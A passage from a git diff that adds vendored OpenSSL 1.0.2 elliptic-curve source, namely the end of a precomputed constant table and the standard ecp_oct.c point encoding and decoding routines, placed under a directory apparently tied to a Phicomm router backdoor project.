+     TOBN(0xc9562c66, 0xdba7495c), TOBN(0x324d301b, 0x46ad348b),
+     TOBN(0x9f46620c, 0xd670407e), TOBN(0x0ea8d4f1, 0xe3733a01),
+     TOBN(0xd396d532, 0xb0c324e0), TOBN(0x5b211a0e, 0x03c317cd),
+     TOBN(0x090d7d20, 0x5ffe7b37), TOBN(0x3b7f3efb, 0x1747d2da),
+     TOBN(0xa2cb525f, 0xb54fc519), TOBN(0x6e220932, 0xf66a971e),
+     TOBN(0xddc160df, 0xb486d440), TOBN(0x7fcfec46, 0x3fe13465),
+     TOBN(0x83da7e4e, 0x76e4c151), TOBN(0xd6fa48a1, 0xd8d302b5),
+     TOBN(0xc6304f26, 0x5872cd88), TOBN(0x806c1d3c, 0x278b90a1),
+     TOBN(0x3553e725, 0xcaf0bc1c), TOBN(0xff59e603, 0xbb9d8d5c),
+     TOBN(0xa4550f32, 0x7a0b85dd), TOBN(0xdec5720a, 0x93ecc217),
+     TOBN(0x0b88b741, 0x69d62213), TOBN(0x7212f245, 0x5b365955),
+     TOBN(0x20764111, 0xb5cae787), TOBN(0x13cb7f58, 0x1dfd3124),
+     TOBN(0x2dca77da, 0x1175aefb), TOBN(0xeb75466b, 0xffaae775),
+     TOBN(0x74d76f3b, 0xdb6cff32), TOBN(0x7440f37a, 0x61fcda9a),
+     TOBN(0x1bb3ac92, 0xb525028b), TOBN(0x20fbf8f7, 0xa1975f29),
+     TOBN(0x982692e1, 0xdf83097f), TOBN(0x28738f6c, 0x554b0800),
+     TOBN(0xdc703717, 0xa2ce2f2f), TOBN(0x7913b93c, 0x40814194),
+     TOBN(0x04924593, 0x1fe89636), TOBN(0x7b98443f, 0xf78834a6),
+     TOBN(0x11c6ab01, 0x5114a5a1), TOBN(0x60deb383, 0xffba5f4c),
+     TOBN(0x4caa54c6, 0x01a982e6), TOBN(0x1dd35e11, 0x3491cd26),
+     TOBN(0x973c315f, 0x7cbd6b05), TOBN(0xcab00775, 0x52494724),
+     TOBN(0x04659b1f, 0x6565e15a), TOBN(0xbf30f529, 0x8c8fb026),
+     TOBN(0xfc21641b, 0xa8a0de37), TOBN(0xe9c7a366, 0xfa5e5114),
+     TOBN(0xdb849ca5, 0x52f03ad8), TOBN(0xc7e8dbe9, 0x024e35c0),
+     TOBN(0xa1a2bbac, 0xcfc3c789), TOBN(0xbf733e7d, 0x9c26f262),
+     TOBN(0x882ffbf5, 0xb8444823), TOBN(0xb7224e88, 0x6bf8483b),
+     TOBN(0x53023b8b, 0x65bef640), TOBN(0xaabfec91, 0xd4d5f8cd),
+     TOBN(0xa40e1510, 0x079ea1bd), TOBN(0x1ad9addc, 0xd05d5d26),
+     TOBN(0xdb3f2eab, 0x13e68d4f), TOBN(0x1cff1ae2, 0x640f803f),
+     TOBN(0xe0e7b749, 0xd4cee117), TOBN(0x8e9f275b, 0x4036d909),
+     TOBN(0xce34e31d, 0x8f4d4c38), TOBN(0x22b37f69, 0xd75130fc),
+     TOBN(0x83e0f1fd, 0xb4014604), TOBN(0xa8ce9919, 0x89415078),
+     TOBN(0x82375b75, 0x41792efe), TOBN(0x4f59bf5c, 0x97d4515b),
+     TOBN(0xac4f324f, 0x923a277d), TOBN(0xd9bc9b7d, 0x650f3406),
+     TOBN(0xc6fa87d1, 0x8a39bc51), TOBN(0x82588530, 0x5ccc108f),
+     TOBN(0x5ced3c9f, 0x82e4c634), TOBN(0x8efb8314, 0x3a4464f8),
+     TOBN(0xe706381b, 0x7a1dca25), TOBN(0x6cd15a3c, 0x5a2a412b),
+     TOBN(0x9347a8fd, 0xbfcd8fb5), TOBN(0x31db2eef, 0x6e54cd22),
+     TOBN(0xc4aeb11e, 0xf8d8932f), TOBN(0x11e7c1ed, 0x344411af),
+     TOBN(0x2653050c, 0xdc9a151e), TOBN(0x9edbfc08, 0x3bb0a859),
+     TOBN(0x926c81c7, 0xfd5691e7), TOBN(0x9c1b2342, 0x6f39019a),
+     TOBN(0x64a81c8b, 0x7f8474b9), TOBN(0x90657c07, 0x01761819),
+     TOBN(0x390b3331, 0x55e0375a), TOBN(0xc676c626, 0xb6ebc47d),
+     TOBN(0x51623247, 0xb7d6dee8), TOBN(0x0948d927, 0x79659313),
+     TOBN(0x99700161, 0xe9ab35ed), TOBN(0x06cc32b4, 0x8ddde408),
+     TOBN(0x6f2fd664, 0x061ef338), TOBN(0x1606fa02, 0xc202e9ed),
+     TOBN(0x55388bc1, 0x929ba99b), TOBN(0xc4428c5e, 0x1e81df69),
+     TOBN(0xce2028ae, 0xf91b0b2a), TOBN(0xce870a23, 0xf03dfd3f),
+     TOBN(0x66ec2c87, 0x0affe8ed), TOBN(0xb205fb46, 0x284d0c00),
+     TOBN(0xbf5dffe7, 0x44cefa48), TOBN(0xb6fc37a8, 0xa19876d7),
+     TOBN(0xbecfa84c, 0x08b72863), TOBN(0xd7205ff5, 0x2576374f),
+     TOBN(0x80330d32, 0x8887de41), TOBN(0x5de0df0c, 0x869ea534),
+     TOBN(0x13f42753, 0x3c56ea17), TOBN(0xeb1f6069, 0x452b1a78),
+     TOBN(0x50474396, 0xe30ea15c), TOBN(0x575816a1, 0xc1494125),
+     TOBN(0xbe1ce55b, 0xfe6bb38f), TOBN(0xb901a948, 0x96ae30f7),
+     TOBN(0xe5af0f08, 0xd8fc3548), TOBN(0x5010b5d0, 0xd73bfd08),
+     TOBN(0x993d2880, 0x53fe655a), TOBN(0x99f2630b, 0x1c1309fd),
+     TOBN(0xd8677baf, 0xb4e3b76f), TOBN(0x14e51ddc, 0xb840784b),
+     TOBN(0x326c750c, 0xbf0092ce), TOBN(0xc83d306b, 0xf528320f),
+     TOBN(0xc4456715, 0x77d4715c), TOBN(0xd30019f9, 0x6b703235),
+     TOBN(0x207ccb2e, 0xd669e986), TOBN(0x57c824af, 0xf6dbfc28),
+     TOBN(0xf0eb532f, 0xd8f92a23), TOBN(0x4a557fd4, 0x9bb98fd2),
+     TOBN(0xa57acea7, 0xc1e6199a), TOBN(0x0c663820, 0x8b94b1ed),
+     TOBN(0x9b42be8f, 0xf83a9266), TOBN(0xc7741c97, 0x0101bd45),
+     TOBN(0x95770c11, 0x07bd9ceb), TOBN(0x1f50250a, 0x8b2e0744),
+     TOBN(0xf762eec8, 0x1477b654), TOBN(0xc65b900e, 0x15efe59a),
+     TOBN(0x88c96148, 0x9546a897), TOBN(0x7e8025b3, 0xc30b4d7c),
+     TOBN(0xae4065ef, 0x12045cf9), TOBN(0x6fcb2caf, 0x9ccce8bd),
+     TOBN(0x1fa0ba4e, 0xf2cf6525), TOBN(0xf683125d, 0xcb72c312),
+     TOBN(0xa01da4ea, 0xe312410e), TOBN(0x67e28677, 0x6cd8e830),
+     TOBN(0xabd95752, 0x98fb3f07), TOBN(0x05f11e11, 0xeef649a5),
+     TOBN(0xba47faef, 0x9d3472c2), TOBN(0x3adff697, 0xc77d1345),
+     TOBN(0x4761fa04, 0xdd15afee), TOBN(0x64f1f61a, 0xb9e69462),
+     TOBN(0xfa691fab, 0x9bfb9093), TOBN(0x3df8ae8f, 0xa1133dfe),
+     TOBN(0xcd5f8967, 0x58cc710d), TOBN(0xfbb88d50, 0x16c7fe79),
+     TOBN(0x8e011b4c, 0xe88c50d1), TOBN(0x7532e807, 0xa8771c4f),
+     TOBN(0x64c78a48, 0xe2278ee4), TOBN(0x0b283e83, 0x3845072a),
+     TOBN(0x98a6f291, 0x49e69274), TOBN(0xb96e9668, 0x1868b21c),
+     TOBN(0x38f0adc2, 0xb1a8908e), TOBN(0x90afcff7, 0x1feb829d),
+     TOBN(0x9915a383, 0x210b0856), TOBN(0xa5a80602, 0xdef04889),
+     TOBN(0x800e9af9, 0x7c64d509), TOBN(0x81382d0b, 0xb8996f6f),
+     TOBN(0x490eba53, 0x81927e27), TOBN(0x46c63b32, 0x4af50182),
+     TOBN(0x784c5fd9, 0xd3ad62ce), TOBN(0xe4fa1870, 0xf8ae8736),
+     TOBN(0x4ec9d0bc, 0xd7466b25), TOBN(0x84ddbe1a, 0xdb235c65),
+     TOBN(0x5e2645ee, 0x163c1688), TOBN(0x570bd00e, 0x00eba747),
+     TOBN(0xfa51b629, 0x128bfa0f), TOBN(0x92fce1bd, 0x6c1d3b68),
+     TOBN(0x3e7361dc, 0xb66778b1), TOBN(0x9c7d249d, 0x5561d2bb),
+     TOBN(0xa40b28bf, 0x0bbc6229), TOBN(0x1c83c05e, 0xdfd91497),
+     TOBN(0x5f9f5154, 0xf083df05), TOBN(0xbac38b3c, 0xeee66c9d),
+     TOBN(0xf71db7e3, 0xec0dfcfd), TOBN(0xf2ecda8e, 0x8b0a8416),
+     TOBN(0x52fddd86, 0x7812aa66), TOBN(0x2896ef10, 0x4e6f4272),
+     TOBN(0xff27186a, 0x0fe9a745), TOBN(0x08249fcd, 0x49ca70db),
+     TOBN(0x7425a2e6, 0x441cac49), TOBN(0xf4a0885a, 0xece5ff57),
+     TOBN(0x6e2cb731, 0x7d7ead58), TOBN(0xf96cf7d6, 0x1898d104),
+     TOBN(0xafe67c9d, 0x4f2c9a89), TOBN(0x89895a50, 0x1c7bf5bc),
+     TOBN(0xdc7cb8e5, 0x573cecfa), TOBN(0x66497eae, 0xd15f03e6),
+     TOBN(0x6bc0de69, 0x3f084420), TOBN(0x323b9b36, 0xacd532b0),
+     TOBN(0xcfed390a, 0x0115a3c1), TOBN(0x9414c40b, 0x2d65ca0e),
+     TOBN(0x641406bd, 0x2f530c78), TOBN(0x29369a44, 0x833438f2),
+     TOBN(0x996884f5, 0x903fa271), TOBN(0xe6da0fd2, 0xb9da921e),
+     TOBN(0xa6f2f269, 0x5db01e54), TOBN(0x1ee3e9bd, 0x6876214e),
+     TOBN(0xa26e181c, 0xe27a9497), TOBN(0x36d254e4, 0x8e215e04),
+     TOBN(0x42f32a6c, 0x252cabca), TOBN(0x99481487, 0x80b57614),
+     TOBN(0x4c4dfe69, 0x40d9cae1), TOBN(0x05869580, 0x11a10f09),
+     TOBN(0xca287b57, 0x3491b64b), TOBN(0x77862d5d, 0x3fd4a53b),
+     TOBN(0xbf94856e, 0x50349126), TOBN(0x2be30bd1, 0x71c5268f),
+     TOBN(0x10393f19, 0xcbb650a6), TOBN(0x639531fe, 0x778cf9fd),
+     TOBN(0x02556a11, 0xb2935359), TOBN(0xda38aa96, 0xaf8c126e),
+     TOBN(0x47dbe6c2, 0x0960167f), TOBN(0x37bbabb6, 0x501901cd),
+     TOBN(0xb6e979e0, 0x2c947778), TOBN(0xd69a5175, 0x7a1a1dc6),
+     TOBN(0xc3ed5095, 0x9d9faf0c), TOBN(0x4dd9c096, 0x1d5fa5f0),
+     TOBN(0xa0c4304d, 0x64f16ea8), TOBN(0x8b1cac16, 0x7e718623),
+     TOBN(0x0b576546, 0x7c67f03e), TOBN(0x559cf5ad, 0xcbd88c01),
+     TOBN(0x074877bb, 0x0e2af19a), TOBN(0x1f717ec1, 0xa1228c92),
+     TOBN(0x70bcb800, 0x326e8920), TOBN(0xec6e2c5c, 0x4f312804),
+     TOBN(0x426aea7d, 0x3fca4752), TOBN(0xf12c0949, 0x2211f62a),
+     TOBN(0x24beecd8, 0x7be7b6b5), TOBN(0xb77eaf4c, 0x36d7a27d),
+     TOBN(0x154c2781, 0xfda78fd3), TOBN(0x848a83b0, 0x264eeabe),
+     TOBN(0x81287ef0, 0x4ffe2bc4), TOBN(0x7b6d88c6, 0xb6b6fc2a),
+     TOBN(0x805fb947, 0xce417d99), TOBN(0x4b93dcc3, 0x8b916cc4),
+     TOBN(0x72e65bb3, 0x21273323), TOBN(0xbcc1badd, 0x6ea9886e),
+     TOBN(0x0e223011, 0x4bc5ee85), TOBN(0xa561be74, 0xc18ee1e4),
+     TOBN(0x762fd2d4, 0xa6bcf1f1), TOBN(0x50e6a5a4, 0x95231489),
+     TOBN(0xca96001f, 0xa00b500b), TOBN(0x5c098cfc, 0x5d7dcdf5),
+     TOBN(0xa64e2d2e, 0x8c446a85), TOBN(0xbae9bcf1, 0x971f3c62),
+     TOBN(0x4ec22683, 0x8435a2c5), TOBN(0x8ceaed6c, 0x4bad4643),
+     TOBN(0xe9f8fb47, 0xccccf4e3), TOBN(0xbd4f3fa4, 0x1ce3b21e),
+     TOBN(0xd79fb110, 0xa3db3292), TOBN(0xe28a37da, 0xb536c66a),
+     TOBN(0x279ce87b, 0x8e49e6a9), TOBN(0x70ccfe8d, 0xfdcec8e3),
+     TOBN(0x2193e4e0, 0x3ba464b2), TOBN(0x0f39d60e, 0xaca9a398),
+     TOBN(0x7d7932af, 0xf82c12ab), TOBN(0xd8ff50ed, 0x91e7e0f7),
+     TOBN(0xea961058, 0xfa28a7e0), TOBN(0xc726cf25, 0x0bf5ec74),
+     TOBN(0xe74d55c8, 0xdb229666), TOBN(0x0bd9abbf, 0xa57f5799),
+     TOBN(0x7479ef07, 0x4dfc47b3), TOBN(0xd9c65fc3, 0x0c52f91d),
+     TOBN(0x8e0283fe, 0x36a8bde2), TOBN(0xa32a8b5e, 0x7d4b7280),
+     TOBN(0x6a677c61, 0x12e83233), TOBN(0x0fbb3512, 0xdcc9bf28),
+     TOBN(0x562e8ea5, 0x0d780f61), TOBN(0x0db8b22b, 0x1dc4e89c),
+     TOBN(0x0a6fd1fb, 0x89be0144), TOBN(0x8c77d246, 0xca57113b),
+     TOBN(0x4639075d, 0xff09c91c), TOBN(0x5b47b17f, 0x5060824c),
+     TOBN(0x58aea2b0, 0x16287b52), TOBN(0xa1343520, 0xd0cd8eb0),
+     TOBN(0x6148b4d0, 0xc5d58573), TOBN(0xdd2b6170, 0x291c68ae),
+     TOBN(0xa61b3929, 0x1da3b3b7), TOBN(0x5f946d79, 0x08c4ac10),
+     TOBN(0x4105d4a5, 0x7217d583), TOBN(0x5061da3d, 0x25e6de5e),
+     TOBN(0x3113940d, 0xec1b4991), TOBN(0xf12195e1, 0x36f485ae),
+     TOBN(0xa7507fb2, 0x731a2ee0), TOBN(0x95057a8e, 0x6e9e196e),
+     TOBN(0xa3c2c911, 0x2e130136), TOBN(0x97dfbb36, 0x33c60d15),
+     TOBN(0xcaf3c581, 0xb300ee2b), TOBN(0x77f25d90, 0xf4bac8b8),
+     TOBN(0xdb1c4f98, 0x6d840cd6), TOBN(0x471d62c0, 0xe634288c),
+     TOBN(0x8ec2f85e, 0xcec8a161), TOBN(0x41f37cbc, 0xfa6f4ae2),
+     TOBN(0x6793a20f, 0x4b709985), TOBN(0x7a7bd33b, 0xefa8985b),
+     TOBN(0x2c6a3fbd, 0x938e6446), TOBN(0x19042619, 0x2a8d47c1),
+     TOBN(0x16848667, 0xcc36975f), TOBN(0x02acf168, 0x9d5f1dfb),
+     TOBN(0x62d41ad4, 0x613baa94), TOBN(0xb56fbb92, 0x9f684670),
+     TOBN(0xce610d0d, 0xe9e40569), TOBN(0x7b99c65f, 0x35489fef),
+     TOBN(0x0c88ad1b, 0x3df18b97), TOBN(0x81b7d9be, 0x5d0e9edb),
+     TOBN(0xd85218c0, 0xc716cc0a), TOBN(0xf4b5ff90, 0x85691c49),
+     TOBN(0xa4fd666b, 0xce356ac6), TOBN(0x17c72895, 0x4b327a7a),
+     TOBN(0xf93d5085, 0xda6be7de), TOBN(0xff71530e, 0x3301d34e),
+     TOBN(0x4cd96442, 0xd8f448e8), TOBN(0x9283d331, 0x2ed18ffa),
+     TOBN(0x4d33dd99, 0x2a849870), TOBN(0xa716964b, 0x41576335),
+     TOBN(0xff5e3a9b, 0x179be0e5), TOBN(0x5b9d6b1b, 0x83b13632),
+     TOBN(0x3b8bd7d4, 0xa52f313b), TOBN(0xc9dd95a0, 0x637a4660),
+     TOBN(0x30035962, 0x0b3e218f), TOBN(0xce1481a3, 0xc7b28a3c),
+     TOBN(0xab41b43a, 0x43228d83), TOBN(0x24ae1c30, 0x4ad63f99),
+     TOBN(0x8e525f1a, 0x46a51229), TOBN(0x14af860f, 0xcd26d2b4),
+     TOBN(0xd6baef61, 0x3f714aa1), TOBN(0xf51865ad, 0xeb78795e),
+     TOBN(0xd3e21fce, 0xe6a9d694), TOBN(0x82ceb1dd, 0x8a37b527)}
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_oct.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_oct.c
new file mode 100644
index 0000000..e5cec8b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_oct.c
@@ -0,0 +1,428 @@
+/* crypto/ec/ecp_oct.c */
+/*
+ * Includes code written by Lenka Fibikova <fibikova@exp-math.uni-essen.de>
+ * for the OpenSSL project. Includes code written by Bodo Moeller for the
+ * OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * Portions of this software developed by SUN MICROSYSTEMS, INC.,
+ * and contributed to the OpenSSL project.
+ */
+
+#include <openssl/err.h>
+#include <openssl/symhacks.h>
+
+#include "ec_lcl.h"
+
+int ec_GFp_simple_set_compressed_coordinates(const EC_GROUP *group,
+                                             EC_POINT *point,
+                                             const BIGNUM *x_, int y_bit,
+                                             BN_CTX *ctx)
+{
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *tmp1, *tmp2, *x, *y;
+    int ret = 0;
+
+    /* clear error queue */
+    ERR_clear_error();
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return 0;
+    }
+
+    y_bit = (y_bit != 0);
+
+    BN_CTX_start(ctx);
+    tmp1 = BN_CTX_get(ctx);
+    tmp2 = BN_CTX_get(ctx);
+    x = BN_CTX_get(ctx);
+    y = BN_CTX_get(ctx);
+    if (y == NULL)
+        goto err;
+
+    /*-
+     * Recover y.  We have a Weierstrass equation
+     *     y^2 = x^3 + a*x + b,
+     * so  y  is one of the square roots of  x^3 + a*x + b.
+     */
+
+    /* tmp1 := x^3 */
+    if (!BN_nnmod(x, x_, &group->field, ctx))
+        goto err;
+    if (group->meth->field_decode == 0) {
+        /* field_{sqr,mul} work on standard representation */
+        if (!group->meth->field_sqr(group, tmp2, x_, ctx))
+            goto err;
+        if (!group->meth->field_mul(group, tmp1, tmp2, x_, ctx))
+            goto err;
+    } else {
+        if (!BN_mod_sqr(tmp2, x_, &group->field, ctx))
+            goto err;
+        if (!BN_mod_mul(tmp1, tmp2, x_, &group->field, ctx))
+            goto err;
+    }
+
+    /* tmp1 := tmp1 + a*x */
+    if (group->a_is_minus3) {
+        if (!BN_mod_lshift1_quick(tmp2, x, &group->field))
+            goto err;
+        if (!BN_mod_add_quick(tmp2, tmp2, x, &group->field))
+            goto err;
+        if (!BN_mod_sub_quick(tmp1, tmp1, tmp2, &group->field))
+            goto err;
+    } else {
+        if (group->meth->field_decode) {
+            if (!group->meth->field_decode(group, tmp2, &group->a, ctx))
+                goto err;
+            if (!BN_mod_mul(tmp2, tmp2, x, &group->field, ctx))
+                goto err;
+        } else {
+            /* field_mul works on standard representation */
+            if (!group->meth->field_mul(group, tmp2, &group->a, x, ctx))
+                goto err;
+        }
+
+        if (!BN_mod_add_quick(tmp1, tmp1, tmp2, &group->field))
+            goto err;
+    }
+
+    /* tmp1 := tmp1 + b */
+    if (group->meth->field_decode) {
+        if (!group->meth->field_decode(group, tmp2, &group->b, ctx))
+            goto err;
+        if (!BN_mod_add_quick(tmp1, tmp1, tmp2, &group->field))
+            goto err;
+    } else {
+        if (!BN_mod_add_quick(tmp1, tmp1, &group->b, &group->field))
+            goto err;
+    }
+
+    if (!BN_mod_sqrt(y, tmp1, &group->field, ctx)) {
+        unsigned long err = ERR_peek_last_error();
+
+        if (ERR_GET_LIB(err) == ERR_LIB_BN
+            && ERR_GET_REASON(err) == BN_R_NOT_A_SQUARE) {
+            ERR_clear_error();
+            ECerr(EC_F_EC_GFP_SIMPLE_SET_COMPRESSED_COORDINATES,
+                  EC_R_INVALID_COMPRESSED_POINT);
+        } else
+            ECerr(EC_F_EC_GFP_SIMPLE_SET_COMPRESSED_COORDINATES,
+                  ERR_R_BN_LIB);
+        goto err;
+    }
+
+    if (y_bit != BN_is_odd(y)) {
+        if (BN_is_zero(y)) {
+            int kron;
+
+            kron = BN_kronecker(x, &group->field, ctx);
+            if (kron == -2)
+                goto err;
+
+            if (kron == 1)
+                ECerr(EC_F_EC_GFP_SIMPLE_SET_COMPRESSED_COORDINATES,
+                      EC_R_INVALID_COMPRESSION_BIT);
+            else
+                /*
+                 * BN_mod_sqrt() should have cought this error (not a square)
+                 */
+                ECerr(EC_F_EC_GFP_SIMPLE_SET_COMPRESSED_COORDINATES,
+                      EC_R_INVALID_COMPRESSED_POINT);
+            goto err;
+        }
+        if (!BN_usub(y, &group->field, y))
+            goto err;
+    }
+    if (y_bit != BN_is_odd(y)) {
+        ECerr(EC_F_EC_GFP_SIMPLE_SET_COMPRESSED_COORDINATES,
+              ERR_R_INTERNAL_ERROR);
+        goto err;
+    }
+
+    if (!EC_POINT_set_affine_coordinates_GFp(group, point, x, y, ctx))
+        goto err;
+
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+size_t ec_GFp_simple_point2oct(const EC_GROUP *group, const EC_POINT *point,
+                               point_conversion_form_t form,
+                               unsigned char *buf, size_t len, BN_CTX *ctx)
+{
+    size_t ret;
+    BN_CTX *new_ctx = NULL;
+    int used_ctx = 0;
+    BIGNUM *x, *y;
+    size_t field_len, i, skip;
+
+    if ((form != POINT_CONVERSION_COMPRESSED)
+        && (form != POINT_CONVERSION_UNCOMPRESSED)
+        && (form != POINT_CONVERSION_HYBRID)) {
+        ECerr(EC_F_EC_GFP_SIMPLE_POINT2OCT, EC_R_INVALID_FORM);
+        goto err;
+    }
+
+    if (EC_POINT_is_at_infinity(group, point)) {
+        /* encodes to a single 0 octet */
+        if (buf != NULL) {
+            if (len < 1) {
+                ECerr(EC_F_EC_GFP_SIMPLE_POINT2OCT, EC_R_BUFFER_TOO_SMALL);
+                return 0;
+            }
+            buf[0] = 0;
+        }
+        return 1;
+    }
+
+    /* ret := required output buffer length */
+    field_len = BN_num_bytes(&group->field);
+    ret =
+        (form ==
+         POINT_CONVERSION_COMPRESSED) ? 1 + field_len : 1 + 2 * field_len;
+
+    /* if 'buf' is NULL, just return required length */
+    if (buf != NULL) {
+        if (len < ret) {
+            ECerr(EC_F_EC_GFP_SIMPLE_POINT2OCT, EC_R_BUFFER_TOO_SMALL);
+            goto err;
+        }
+
+        if (ctx == NULL) {
+            ctx = new_ctx = BN_CTX_new();
+            if (ctx == NULL)
+                return 0;
+        }
+
+        BN_CTX_start(ctx);
+        used_ctx = 1;
+        x = BN_CTX_get(ctx);
+        y = BN_CTX_get(ctx);
+        if (y == NULL)
+            goto err;
+
+        if (!EC_POINT_get_affine_coordinates_GFp(group, point, x, y, ctx))
+            goto err;
+
+        if ((form == POINT_CONVERSION_COMPRESSED
+             || form == POINT_CONVERSION_HYBRID) && BN_is_odd(y))
+            buf[0] = form + 1;
+        else
+            buf[0] = form;
+
+        i = 1;
+
+        skip = field_len - BN_num_bytes(x);
+        if (skip > field_len) {
+            ECerr(EC_F_EC_GFP_SIMPLE_POINT2OCT, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+        while (skip > 0) {
+            buf[i++] = 0;
+            skip--;
+        }
+        skip = BN_bn2bin(x, buf + i);
+        i += skip;
+        if (i != 1 + field_len) {
+            ECerr(EC_F_EC_GFP_SIMPLE_POINT2OCT, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+
+        if (form == POINT_CONVERSION_UNCOMPRESSED
+            || form == POINT_CONVERSION_HYBRID) {
+            skip = field_len - BN_num_bytes(y);
+            if (skip > field_len) {
+                ECerr(EC_F_EC_GFP_SIMPLE_POINT2OCT, ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+            while (skip > 0) {
+                buf[i++] = 0;
+                skip--;
+            }
+            skip = BN_bn2bin(y, buf + i);
+            i += skip;
+        }
+
+        if (i != ret) {
+            ECerr(EC_F_EC_GFP_SIMPLE_POINT2OCT, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+    }
+
+    if (used_ctx)
+        BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+
+ err:
+    if (used_ctx)
+        BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return 0;
+}
+
+int ec_GFp_simple_oct2point(const EC_GROUP *group, EC_POINT *point,
+                            const unsigned char *buf, size_t len, BN_CTX *ctx)
+{
+    point_conversion_form_t form;
+    int y_bit;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *x, *y;
+    size_t field_len, enc_len;
+    int ret = 0;
+
+    if (len == 0) {
+        ECerr(EC_F_EC_GFP_SIMPLE_OCT2POINT, EC_R_BUFFER_TOO_SMALL);
+        return 0;
+    }
+    form = buf[0];
+    y_bit = form & 1;
+    form = form & ~1U;
+    if ((form != 0) && (form != POINT_CONVERSION_COMPRESSED)
+        && (form != POINT_CONVERSION_UNCOMPRESSED)
+        && (form != POINT_CONVERSION_HYBRID)) {
+        ECerr(EC_F_EC_GFP_SIMPLE_OCT2POINT, EC_R_INVALID_ENCODING);
+        return 0;
+    }
+    if ((form == 0 || form == POINT_CONVERSION_UNCOMPRESSED) && y_bit) {
+        ECerr(EC_F_EC_GFP_SIMPLE_OCT2POINT, EC_R_INVALID_ENCODING);
+        return 0;
+    }
+
+    if (form == 0) {
+        if (len != 1) {
+            ECerr(EC_F_EC_GFP_SIMPLE_OCT2POINT, EC_R_INVALID_ENCODING);
+            return 0;
+        }
+
+        return EC_POINT_set_to_infinity(group, point);
+    }
+
+    field_len = BN_num_bytes(&group->field);
+    enc_len =
+        (form ==
+         POINT_CONVERSION_COMPRESSED) ? 1 + field_len : 1 + 2 * field_len;
+
+    if (len != enc_len) {
+        ECerr(EC_F_EC_GFP_SIMPLE_OCT2POINT, EC_R_INVALID_ENCODING);
+        return 0;
+    }
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return 0;
+    }
+
+    BN_CTX_start(ctx);
+    x = BN_CTX_get(ctx);
+    y = BN_CTX_get(ctx);
+    if (y == NULL)
+        goto err;
+
+    if (!BN_bin2bn(buf + 1, field_len, x))
+        goto err;
+    if (BN_ucmp(x, &group->field) >= 0) {
+        ECerr(EC_F_EC_GFP_SIMPLE_OCT2POINT, EC_R_INVALID_ENCODING);
+        goto err;
+    }
+
+    if (form == POINT_CONVERSION_COMPRESSED) {
+        if (!EC_POINT_set_compressed_coordinates_GFp
+            (group, point, x, y_bit, ctx))
+            goto err;
+    } else {
+        if (!BN_bin2bn(buf + 1 + field_len, field_len, y))
+            goto err;
+        if (BN_ucmp(y, &group->field) >= 0) {
+            ECerr(EC_F_EC_GFP_SIMPLE_OCT2POINT, EC_R_INVALID_ENCODING);
+            goto err;
+        }
+        if (form == POINT_CONVERSION_HYBRID) {
+            if (y_bit != BN_is_odd(y)) {
